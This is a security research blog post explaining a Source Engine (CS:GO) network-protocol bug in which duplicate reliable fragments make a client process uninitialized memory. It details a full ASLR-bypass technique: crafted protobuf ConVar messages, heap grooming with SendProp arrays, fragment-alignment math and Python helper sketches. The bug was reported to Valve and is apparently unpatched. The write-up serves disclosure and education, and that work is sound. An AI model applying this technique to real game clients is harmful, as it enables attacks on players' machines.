Offensive on the Source Engine Network Protocol - Part 1: InfoLeak
This post kicks off a short series dedicated to my work on exploiting Source Engine 1 back in 2022-2023. At the time, CS2 was not out yet, so the primary target was still CS:GO. Over the course of these posts, I’ll talk about the few bugs that I found and how I exploited them to get remote code execution – particularly targeting CS:GO. In particular, I’ll focus on the engine’s network protocol and delve into its internals.
What makes the Source Engine a great candidate for exploitation is the ability for the community to host their own servers. Anyone can host a custom server and allow any player to join it. This creates a fairly large attack surface, since an attacker can potentially mess with the communication protocol between the server and the clients. Targeting the network protocol is quite interesting because it is interactive, which is needed if we want to break ASLR.
In this post, I’ll quickly go over the network protocol, then talk about an information leak bug I found.
Source Engine Network Protocol in a nutshell
The Source Engine uses its own UDP-based transport layer protocol to communicate between clients and servers. On top of the transport layer, the application layer utilizes – in the case of CS:GO – protobuf-based messages that define what the client and server may send and receive.
In this series of posts, we’ll focus on the transport layer protocol. Based on UDP, it allows for sending both unreliable and reliable messages over the same socket: for each message, the sender chooses whether it should be reliably delivered – i.e. acknowledged by the remote peer – or not.
When it comes to sending a batch of reliable messages, the engine operates this way:
- it serializes each reliable message to send
- it concatenates all serialized messages into a single long buffer (up to a certain byte size)
- optional: it compresses the whole buffer
- it splits the buffer into fragments (of 0x100 bytes each for CS:GO)
- it finally sends the fragments to its peer
Fragments may arrive out of order. For each successfully received fragment, the peer sends back an acknowledgement. Finally, once all fragments have been received, the peer decompresses the whole buffer (if compressed), and sequentially deserializes and processes each message.
You can think of this reliable messaging protocol as an alternative to TCP. While the underlying implementation and specification are completely different, the goal is similar: ensuring data is reliably delivered to the peer.
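The sender-side pipeline above can be sketched in a few lines of Python (the helper names are mine, not the engine’s; the 0x100 fragment size is the one CS:GO uses):

```python
FRAGMENT_SIZE = 0x100  # fragment size used by CS:GO

def split_into_fragments(payload: bytes) -> list[bytes]:
    """Split a serialized (and possibly compressed) reliable buffer
    into FRAGMENT_SIZE-byte chunks, as the engine does before sending."""
    return [payload[i:i + FRAGMENT_SIZE]
            for i in range(0, len(payload), FRAGMENT_SIZE)]

def reassemble(fragments: list[bytes]) -> bytes:
    """Receiver side: concatenate the fragments back into the buffer."""
    return b"".join(fragments)

buf = bytes(0x250)                   # a 0x250-byte reliable payload
frags = split_into_fragments(buf)
assert len(frags) == 3               # 0x100 + 0x100 + 0x50
assert reassemble(frags) == buf
```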
The Bug
The first bug I found in the protocol lies in how the game checks whether all data fragments for a reliable communication have been received. When receiving reliable messages, the game stores the metadata in a structure that we’ll call data_fragments. Among other things, it records the expected total number of fragments to receive – in data->total_fragments.
Let’s take a look at the function responsible for parsing incoming fragments:
bool CNetChan::ReadSubChannelData(bf_read &received, int stream_idx)
{
    data_fragments* data = &this->stream_data[stream_idx];
    bool is_single_block = received.ReadOneBit() == 0; // is that a single block?
    if(!is_single_block)
    {
        start_fragment = received.ReadUBitLong(...);
        fragments_num = received.ReadUBitLong(3); // number of fragments stored on 3 bits
        offset = start_fragment * FRAGMENT_SIZE;
        len = fragments_num * FRAGMENT_SIZE;
    }
    if(offset == 0) // if first fragment then read metadata
    {
        <...>
        data->byte_count = received.ReadUBitLong(...);
        data->buffer = malloc(data->byte_count);
        data->total_fragments = bytesize_to_fragments(data->byte_count);
        data->acked_fragments = 0;
        <...>
    }
    <...> // some checks
    received.ReadBytes(data->buffer + offset, len); // read block data
    data->acked_fragments += fragments_num; // increment the count of acked fragments
    return true;
}
As we can see, when receiving the first fragment, the game reads some metadata such as the byte size of the message. Then, it computes the expected total number of fragments to receive, and initializes the counter data->acked_fragments to track how many fragments have been received. Each time new fragments arrive, data->acked_fragments is incremented.
Later, the game checks whether it has received all fragments and whether it should proceed to process the received messages. This is done in:
bool CNetChan::CheckReceivingList(int stream_idx)
{
    data_fragments* data = &this->stream_data[stream_idx];
    <...>
    if (data->acked_fragments < data->total_fragments)
        return true;
    if (data->acked_fragments > data->total_fragments)
        return false;
    // we got all fragments... right?
    <...>
    ProcessMessages(data->buffer);
    <...>
}
At first sight, this seems okay-ish: it checks if the number of received fragments matches the expected total. But if we look back at the fragment-receiving routine… nothing prevents receiving the same fragment twice!
“How’s that a problem?”, you might think.
Well, let’s consider a situation with 3 fragments. Suppose we send:
- the first fragment (fragment 0),
- the third fragment (fragment 2) twice.
The game will have received three fragments total – matching the expected number – and will proceed to process the messages.
However, fragment 1 was never received, and the buffer chunk meant for it remains uninitialized!
Eventually, when ProcessMessages is called in CNetChan::CheckReceivingList, it will try to process the whole buffer – including the uninitialized chunk meant for the second fragment (fragment 1)!
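A toy Python model of this accounting (not the engine’s code) makes the flaw obvious:

```python
TOTAL_FRAGMENTS = 3      # expected number of fragments (data->total_fragments)

acked_fragments = 0      # the engine's counter (data->acked_fragments)
received = set()         # which fragment indices actually arrived

# Attacker sends fragment 0 once and fragment 2 twice; fragment 1 never arrives.
for frag_idx in [0, 2, 2]:
    received.add(frag_idx)
    acked_fragments += 1          # incremented blindly, even for duplicates

# CheckReceivingList-style check: counters match, so the buffer is processed...
assert acked_fragments == TOTAL_FRAGMENTS
# ...even though fragment 1 was never received and its chunk is uninitialized.
assert 1 not in received
```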
Breaking ASLR
This kind of bug is unlikely to lead to memory corruption. However, since it allows you to trick the game into processing uninitialized memory as if it were legitimate data from the host, it can likely be exploited to leak information.
That said, exploiting this vulnerability requires precise control over what you send to the peer and when. Rather than building a proxy to intercept and modify live game traffic, I chose to reverse-engineer and fully reimplement the protocol from scratch. So, in the end, I built a custom server in Python that lets me send whatever I want, whenever I want… which is way more comfortable and flexible than any other hacky solution.
For the rest of this post, we’ll consider that we are a malicious server, with the goal of leaking information from the connected clients.
Global strategy
So, how do we turn this into an information leak? To achieve this, we need to find:
- a game message whose content is stored by the client,
- a way to query that content back.
The overall idea is to use a game message that causes the client to store uninitialized data, as if it were legitimately sent by the server. Then, by querying this content back, the client would unknowingly send the uninitialized data – effectively leaking it to the server.
Unfortunately, the Source Engine server is authoritative. Most communication flows from the server to the client, not the other way around. The server generally doesn’t have much to query from the client. After all, why would the server send data to the client, only to query it back later?
Yet, luckily, there is one feature in the Source Engine that fits our needs: ConVar.
Leveraging ConVar to leak data
ConVars are configuration variables used by the Source Engine to control various behaviors, both on client and server side. Each ConVar has a name, an associated value – typically a string, float, or integer – and optional metadata such as flags – e.g. read-only, cheat-protected – and callbacks. What makes ConVars interesting in our situation is that:
- servers can query or set ConVar values on connected clients via game messages,
- clients may respond with ConVar data, which can become a side-channel for leaking information if those values are influenced by uninitialized data.
Basically, if the server tricks the client into storing uninitialized memory into a ConVar, and then queries that value back, it may leak sensitive data back to the attacker!
Here are the relevant protobuf game messages for ConVar manipulation. To set ConVar values on connected clients, the server sends a CNETMsg_SetConVar message, which wraps a list of name-value pairs:
message CMsg_CVars {
message CVar {
optional string name = 1;
optional string value = 2;
}
repeated .CMsg_CVars.CVar cvars = 1;
}
message CNETMsg_SetConVar {
optional .CMsg_CVars convars = 1;
}
To query ConVar values from clients, the server sends a CSVCMsg_GetCvarValue request. The client then responds with a CCLCMsg_RespondCvarValue message containing the value:
message CSVCMsg_GetCvarValue {
optional int32 cookie = 1;
optional string cvar_name = 2;
}
message CCLCMsg_RespondCvarValue {
optional int32 cookie = 1;
optional int32 status_code = 2;
optional string name = 3;
optional string value = 4;
}
The cookie field acts as an identifier to match the response with the query, and the status_code indicates whether the query succeeded. If a ConVar exists on the client and isn’t protected (e.g. by a flag like FCVAR_PROTECTED), the client will send back its current value.
To exploit this, we need to craft data fragments such that a CNETMsg_SetConVar message spans across two fragments. The goal is for part of the message to fall in the uninitialized fragment chunk – specifically, the value field. This way, the client will parse and store the value field using uninitialized data, effectively injecting it into an existing ConVar that we can query afterwards.
“Okay but how do we actually pull that off?”
To achieve this, we need to delve a bit into the protobuf (de)serialization format.
Protobuf serialization format
Protobuf serializes data as key-value pairs – see the documentation for more information – where each field is encoded with:
- a key (varint: (field_number << 3) | wire_type)
- a value, whose format depends on the wire type (e.g. string, varint, fixed64)
Each string is encoded as:
[field key] [length varint] [raw bytes/string content]
One critical detail is that field order in the serialized message is not enforced. Since every field has a unique identifier, protobuf parsers don’t rely on a fixed order. This means that a message like CVar:
message CVar {
optional string name = 1;
optional string value = 2;
}
can legally be serialized with value placed after name, or the other way around!
This flexibility comes in very handy for our exploitation. By putting the value field at the end of the message, we can arrange the fragment layout such that value falls across a fragment boundary – specifically, such that its string content – just after the length varint – ends up being read from the uninitialized fragment.
Say we want to serialize:
name: "leak_me"
value: "aaaaaaaa"
We craft the fields so value comes last:
0A 07 6C 65 61 6B 5F 6D 65      // name = "leak_me"
12 08 61 61 61 61 61 61 61 61   // value = "aaaaaaaa"
Now, if we make sure that a fragment ends right after the 08 (the string length of value), and that the subsequent fragment is left uninitialized, then the content of value will be read from uninitialized memory:
0A 07 6C 65 61 6B 5F 6D 65      // name = "leak_me"
12 08 ?? ?? ?? ...              // value = ??? (uninitialized)
      🡑 (fragment ends here)
and will eventually be stored into the client’s leak_me ConVar.
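This hand-rolled encoding is easy to reproduce in Python (encode_string_field is my own helper; it assumes the field number and string length each fit in a single varint byte, which holds here):

```python
def encode_string_field(field_number: int, value: bytes) -> bytes:
    """Encode a protobuf length-delimited field: key varint, length, raw bytes.
    Assumes field_number < 16 and len(value) < 128, so both fit in one byte."""
    key = (field_number << 3) | 2            # wire type 2 = length-delimited
    return bytes([key, len(value)]) + value

# Serialize the CVar with the `value` field last, so that its content
# can be made to straddle a fragment boundary.
cvar = encode_string_field(1, b"leak_me") + encode_string_field(2, b"aaaaaaaa")
assert cvar.hex(" ") == "0a 07 6c 65 61 6b 5f 6d 65 12 08 61 61 61 61 61 61 61 61"
```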
In the end, we can simply send a CSVCMsg_GetCvarValue message to query that ConVar, and the client will respond with a CCLCMsg_RespondCvarValue containing the parsed value – effectively leaking the first few bytes of the uninitialized fragment.
What to leak?
So, we’ve shown that it’s possible to leak uninitialized memory from the client. But now comes the question: what do we leak? Or rather, what can we leak?
Leaking random heap junk isn’t likely to be useful. Ideally, we want to leak a pointer – something that lets us compute the base address of an executable section (e.g. a shared library or the main executable itself).
To do this, we need to massage the heap such that a freed buffer – previously holding pointers – is re-allocated when receiving our CNETMsg_SetConVar message. So, here’s the plan:
- trigger an allocation client-side,
- ensure that the allocated buffer contains pointers – especially around potential fragment frontiers,
- free that buffer,
- re-allocate it to receive our incoming fragments,
- leak the stale pointers via ConVars.
After reading write-ups on past Source Engine exploits – especially this SecretClub blogpost – I knew exactly which game mechanic would fit my needs: prop tables. In the Source Engine, prop tables – short for property tables – define the structure of networked entity data. Each entry maps a named property to its type, low value, high value, etc. These tables are generated from server-side entity classes and sent to clients, allowing them to parse incoming entity updates correctly.
Prop tables are sent via the CSVCMsg_SendTable message:
message CSVCMsg_SendTable
{
message sendprop_t
{
optional int32 type = 1;
optional string var_name = 2;
optional int32 flags = 3;
optional int32 priority = 4;
optional string dt_name = 5;
optional int32 num_elements = 6;
optional float low_value = 7;
optional float high_value = 8;
optional int32 num_bits = 9;
};
optional bool is_end = 1;
optional string net_table_name = 2;
optional bool needs_decoder = 3;
repeated sendprop_t props = 4;
}
We see that each table contains a list of sendprop_t sub-messages. When the client receives a CSVCMsg_SendTable, it internally allocates an array of SendProp C++ objects and populates it based on the message content. This array is allocated via the C++ new[] operator, which means that all objects are stored contiguously in memory.
Internally, the new[] operator also stores the number of SendProp objects at the start of the buffer – just before the first object – to keep track of how many destructors to call during deletion. Since we control the number of sendprop_t entries in the message, we also control the size of the allocated array – which becomes very useful when we want that buffer to later be re-allocated for our crafted fragments.
What makes SendProp particularly interesting is that it is a derived C++ class with virtual methods, meaning that each object has a vtable pointer! So, by allocating a SendProp array, we end up with a buffer of memory filled with pointers at known offsets, one per object:
[Figure: the SendProp array layout]
Vtables are great leak targets because they point directly into fixed offsets within known memory sections. If we manage to leak one of them, we can compute the base address of the module, thus defeating ASLR – yay!
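To see what this buffer looks like in memory, here’s a small Python sketch (the 0x88 object size and the 8-byte new[] count prefix match CS:GO at the time; the helper name is mine):

```python
SENDPROP_SIZE = 0x88   # sizeof(SendProp) in CS:GO at the time
COUNT_PREFIX = 0x8     # new[] stores the element count before the first object

def vtable_offsets(num_props: int) -> list[int]:
    """Offset of each SendProp's vtable pointer (its first member),
    relative to the start of the new[] allocation."""
    return [COUNT_PREFIX + i * SENDPROP_SIZE for i in range(num_props)]

# A 16-element array yields vtable pointers at 0x8, 0x90, 0x118, ...
offs = vtable_offsets(16)
assert offs[:3] == [0x8, 0x90, 0x118]
```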
“Okay, but you mentioned freeing the buffer, can we actually cause that?”
No need! In fact, the engine already does it by itself! When a CSVCMsg_SendTable is received, the engine allocates the SendProp array, fills it in, and then copies its content into another structure. Afterwards, the original array is freed immediately – exactly what we want for our re-allocation strategy!
Aligning SendProp and fragments
So, we’ve figured out how to leak uninitialized memory from the client, and we’ve identified a leak target – i.e. vtable pointers inside SendProp arrays. Now it’s time to put the pieces together and build a full leak primitive. The goal is simple: trick the client into placing a stale SendProp vtable pointer at a fragment frontier, leak it into a ConVar, then have the client send it back to us.
First, we need to figure out how many SendProp objects are required so that one of them ends up aligned with the start of a fragment – if such alignment is possible at all. The goal is to line up a SendProp in memory such that its vtable pointer overlaps the portion of memory that gets interpreted as the ConVar value field. Here is the memory layout that we are aiming for:
[Figure: the SendProp vtable leak]
In our case, fragments are 0x100 bytes long, whereas each SendProp object is 0x88 bytes long – at least in CS:GO at the time.
We also need to take into account that the first SendProp object starts at offset 0x8 – the array is prepended with the total number of SendProp objects.
This mismatch means we’ll need to do some math – hehe. You can actually reduce the problem to a diophantine equation:

$$0\mathrm{x}100 \cdot x = 0\mathrm{x}8 + 0\mathrm{x}88 \cdot y$$

where $x$ is the number of fragments before alignment, and $y$ is the number of SendProp objects before alignment.
In the end, you’ll find that $x = 8$ and $y = 15$ is a solution to the equation, meaning that the 9th fragment and the 16th SendProp object will be aligned!
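The solution can be checked (or found in the first place) with a quick brute force – a sketch with my own helper name:

```python
FRAGMENT_SIZE = 0x100   # fragment size
SENDPROP_SIZE = 0x88    # sizeof(SendProp)
COUNT_PREFIX = 0x8      # new[] count stored before the first object

def smallest_alignment() -> tuple[int, int]:
    """Find the smallest (x, y) such that x fragments' worth of bytes lands
    exactly on the start of the (y+1)-th SendProp: 0x100*x == 0x8 + 0x88*y."""
    for x in range(1, 1000):
        delta = x * FRAGMENT_SIZE - COUNT_PREFIX
        if delta % SENDPROP_SIZE == 0:
            return x, delta // SENDPROP_SIZE
    raise ValueError("no solution found")

assert smallest_alignment() == (8, 15)   # 9th fragment aligns with 16th SendProp
```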
Putting it all together
At last, we have all the pieces required for a successful information leak. Here’s how we tie it all together:
- heap spraying: send a bunch of CSVCMsg_SendTable messages to fill the heap and increase the probability of re-allocating a SendProp array,
- craft our fragments such that the CNETMsg_SetConVar message straddles the 9th fragment frontier – with the value field at the beginning of that fragment,
- trigger the bug: send the fragments to the client – except the 9th one – and resend a previous fragment – causing the 9th chunk to remain uninitialized,
- hope that the buffer allocated for the fragments contains stale SendProp objects,
- extract the leaked value: query the ConVar with a CSVCMsg_GetCvarValue request,
- compute the base address and profit!
For reference, the vtable for SendProp resides in engine_client.so. So by leaking the vtable pointer, we can compute the base address of engine_client.so.
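Recovering the base address is then a single subtraction. In the sketch below, SENDPROP_VTABLE_OFFSET is a placeholder – the real offset of the SendProp vtable inside engine_client.so would come from your own reversing of the binary:

```python
# Placeholder offset of the SendProp vtable within engine_client.so
# (hypothetical value for illustration, not the real one).
SENDPROP_VTABLE_OFFSET = 0x123456

def engine_client_base(leaked_vtable_ptr: int) -> int:
    """Compute the base address of engine_client.so from a leaked
    SendProp vtable pointer, defeating ASLR."""
    return leaked_vtable_ptr - SENDPROP_VTABLE_OFFSET

# If the ConVar leak handed us this pointer...
leak = 0x7F1234560000 + SENDPROP_VTABLE_OFFSET
assert engine_client_base(leak) == 0x7F1234560000
```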
In the end, this turned out to be super reliable – all it took was finding the best allocation size to maximize the probability of success.
From here, it’s just a matter of using that leaked pointer to bypass ASLR and chain into something more powerful…
Conclusion
This bug wasn’t about crashing the client or hijacking control flow (yet) – it was about understanding how the engine behaves under edge conditions, when we break its assumptions. By exploiting the way the Source Engine handles reliable message fragments, we built a clean and reliable information leak. This bug was pretty interesting to exploit, as it required a bit of engineering and a deep dive into the engine internals and protobuf serialization mechanisms. In the end, we get a vtable pointer from engine_client.so, giving us a great ASLR bypass – and a starting point for more.
In the upcoming posts of this series, I’ll dive into memory corruption bugs and dirty heap manipulations that ultimately lead to remote code execution client-side. Stay tuned for the deep technical details and exploits – it’ll be fun!
Responsible Disclosure
I reported this vulnerability to Valve in November 2022 via HackerOne. Unfortunately, Valve has a reputation for slow or limited responsiveness to security reports, and to the best of my knowledge, this particular bug was never patched in CS:GO or any other affected Source 1 game. With the planned release of CS2 a few months after the report, it seems Valve deprioritized fixing issues in their legacy engine – which was nonetheless still in use at the time by CS:GO players. Recently, some Source 1 titles like Team Fortress 2 have been updated to support Valve’s newer network protocol stack – GameNetworkingSockets – used in newer titles like CS2.